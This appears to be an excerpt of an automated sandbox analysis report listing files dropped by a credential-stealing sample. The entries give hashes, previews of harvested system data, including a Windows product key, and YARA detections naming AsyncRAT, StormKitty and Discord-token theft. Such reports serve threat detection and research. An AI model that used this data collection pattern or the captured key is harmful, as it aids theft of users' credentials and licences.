                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):282
                                                                  Entropy (8bit):3.5191090305155277
                                                                  Encrypted:false
                                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                                  MD5:3A37312509712D4E12D27240137FF377
                                                                  SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                                  SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                                  SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):190
                                                                  Entropy (8bit):3.5497401529130053
                                                                  Encrypted:false
                                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                  MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                  SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                  SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                  SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):190
                                                                  Entropy (8bit):3.5497401529130053
                                                                  Encrypted:false
                                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                                  MD5:87A524A2F34307C674DBA10708585A5E
                                                                  SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                                  SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                                  SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):504
                                                                  Entropy (8bit):3.514398793376306
                                                                  Encrypted:false
                                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                  MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                  SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                  SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                  SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\System\Process.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):17736
                                                                  Entropy (8bit):5.696924858590766
                                                                  Encrypted:false
                                                                  SSDEEP:96:HlcQuJQuwQX7QCpzQu2Q8C23ioQ11QuvkQu4QpqcBZQpUESRQq4QCYqQu6QubfwK:HzqnUEYbY/tBmIJzvww4WKc16uH2
                                                                  MD5:188BF0D4BAB63D07DCF76295F9FE4368
                                                                  SHA1:AD03D1D21A5C0D963264DD7667144360FB4B591F
                                                                  SHA-256:3F825C434813824A0AEF6BE24263B6EED7D1EB2617378AE281280690860A7C73
                                                                  SHA-512:107100A65DFD1F6867C2BCCAA8A80E8540344B9F29FFBD2B5734309C23A4C80B067CC9D2C886ED6557586530EFBA025C1ADF8C107CD57BBADD9A1783A6F76B53
                                                                  Malicious:false
                                                                  Preview:NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 5596..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 6888..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 6456..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: fontdrvhost..PID: 784..EXE: C:\Windows\system32\fontdrvhost.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 6020..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: smartscreen..PID: 5584..EXE: C:\Windows\System32\smartscreen.exe..NAME: dllhost..PID: 3428..EXE: C:\Windows\system32\DllHost.exe..NAME: csrss..PID: 408..EXE: ..NAME: svchost..PID: 1724..EXE: C:\Windows\

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\System\ProductKey.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):29
                                                                  Entropy (8bit):4.142295219190902
                                                                  Encrypted:false
                                                                  SSDEEP:3:O2eRntm:OrRnI
                                                                  MD5:69F1EB7DBB946D78F0D2AE0B7228257C
                                                                  SHA1:E1229CD69E21F921D135B7575A0F8E1EC5CAB0F5
                                                                  SHA-256:3240C86D3379358DB1AC976D64A510BA746F273BBCC6A16C4C88E4D0002E3F9D
                                                                  SHA-512:DAD1B6A1B744869CB2B77FEFC202E9AAA724BD3B9254C827C7F2C006A906DC3671038B1C189B965F7017E76003AECE7ADAE4DEFB7E3D6E6860258A120666E5D4
                                                                  Malicious:false
                                                                  Preview:PJN2M-GWXQB-JGFCC-DT97H-B64C4

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\System\ScanningNetworks.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):84
                                                                  Entropy (8bit):4.6630509827051725
                                                                  Encrypted:false
                                                                  SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                                  MD5:58CD2334CFC77DB470202487D5034610
                                                                  SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                                  SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                                  SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                                  Malicious:false
                                                                  Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\System\Windows.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):13461
                                                                  Entropy (8bit):5.661557387078866
                                                                  Encrypted:false
                                                                  SSDEEP:96:okQuRQuIQuTQu7QuOQuwQuNQuHkQuQQR5HRQu5QugQuSQuyQu1KQuoQ4yzqToQuA:9mm6Nr
                                                                  MD5:2E19D87AA7C2834A564D143E94FFB72B
                                                                  SHA1:05B32AB94A1BE83DD5130EEC1D3425F876F99F62
                                                                  SHA-256:E26FE6099161CBCB45FFC873C1F972616A5176AE45BCBC5FAF8EC2E50668781E
                                                                  SHA-512:9340F24E7AB865AD93DA0E4686504B3E1DB5DB488AD1E347519901725D2A7B6A5E93E9025BA17B4FDD2ED03E026AF237DEB81CDE0307E33856E13B4234FB6684
                                                                  Malicious:false
                                                                  Preview:NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 5596..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6888..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6456..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6020..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6864..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6432..EXE: C:\Prog

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\System\WorldWind.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                  Category:dropped
                                                                  Size (bytes):89107
                                                                  Entropy (8bit):7.85553101074918
                                                                  Encrypted:false
                                                                  SSDEEP:1536:CBu/u2jECGPMEoXe1o8oZmGww44qaaflp2RoNVbMhj9lAOINqH5b1ocI/MgMrl6I:Gu/7UUEou1oFWw4vaaflpLVbMh7tINqJ
                                                                  MD5:DCFF6500594A6AEE43397F2C5A79B9AF
                                                                  SHA1:1E9253C373E26366AE7042480B2AA3576D268E04
                                                                  SHA-256:27A3DC512AF87F6F9D77AD11F9E1868409C133019CDB39443DC5DD11FDA0E2BC
                                                                  SHA-512:2958956281152B172393194916CD027736B6611CB2CB4A1490CA5F188148F1A259577049EC1A7AD2ABFB3EB605EE866D5D80493C877909889F5A02F843ED1634
                                                                  Malicious:false
                                                                  Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(....~....[.....).....+.F"8x{I.t.p....pj.g.Ez..+..........O.Wz.......\..4;?...O.........QA..Z.DqCr.Y...L....V..\A.

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  File Type:CSV text
                                                                  Category:dropped
                                                                  Size (bytes):425
                                                                  Entropy (8bit):5.353683843266035
                                                                  Encrypted:false
                                                                  SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                  MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                  SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                  SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                  SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zrrHgsDzgS.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\zrrHgsDzgS.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):522
                                                                  Entropy (8bit):5.358731107079437
                                                                  Encrypted:false
                                                                  SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhat92n4M6:ML9E4KlKDE4KhKiKhg84j
                                                                  MD5:AE6AF1A0CB468ECBA64E2D77CB4517DB
                                                                  SHA1:09BD6366ED569ADB79274BBAB0BBF09C8244FD97
                                                                  SHA-256:3A917DCBC4952EA9A1135B379B56604B3B63198E540C653683D522445258B710
                                                                  SHA-512:E578CD0D9BF43FD1BA737B9C44B70130462CE55B4F368E2E341BB94A3A3FFA47D4A9FE714EB86926620D1B4BE9FFF4582C219DF9ACC923C765650B13C5451500
                                                                  Malicious:true
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1216
                                                                  Entropy (8bit):5.377376311942076
                                                                  Encrypted:false
                                                                  SSDEEP:24:3K/ZWSKco4KmZjKbmOIld6emN1s4RPQoU99tXt/NK3R8e9ia4:AWSU4xym/jms4RIoU99tlNWR82m
                                                                  MD5:DECF085D1067F7B0CC8044B2152F6B68
                                                                  SHA1:386F4D0A428293E1EAE6FAA840CC60668C611CAB
                                                                  SHA-256:12AB17B4910CFAA4F343EE54992F106CA08F89334EFC4666766B0868B31BE18A
                                                                  SHA-512:6EF8AEEF4040BAF3F76D66695BCEB63EEEF05BB7A2F897B9AD436EDA2540F50EA0458499AB44AE367625A8A855721640AB3AFA84B86F584B413AC896EC3BF833
                                                                  Malicious:false
                                                                  Preview:@...e.................................@..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5y0ew412.31y.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apoyqnnj.bhi.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnsol35v.23t.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0iyhuol.xat.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\luglzv.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:modified
                                                                  Size (bytes):179200
                                                                  Entropy (8bit):5.896732339431866
                                                                  Encrypted:false
                                                                  SSDEEP:3072:Ie8p6ewdOIwQx76vK/bvTv0cU+lL/dMlZZUZ0b2gTrwARE+WpCc:c6ewwIwQJ6vKX0c5MlYZ0b2s
                                                                  MD5:FF895D93516828450E0C0DD0E467E1D0
                                                                  SHA1:A19EDAA4B1FBFB8B3C8FE61D4CAC894BEB921B39
                                                                  SHA-256:24C4301E81D0F742D7470FDAAE62499B9793265F2E78D77C71E8B84BF1718CCA
                                                                  SHA-512:C3758AA89990653619C4803122FD0761E1C2709FEA0DD9B89317AC4627D4E73E54A15397F121716B1DD48FB180FBBD2ED4A3C7B799B11743B2F9079CD1B9F75E
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
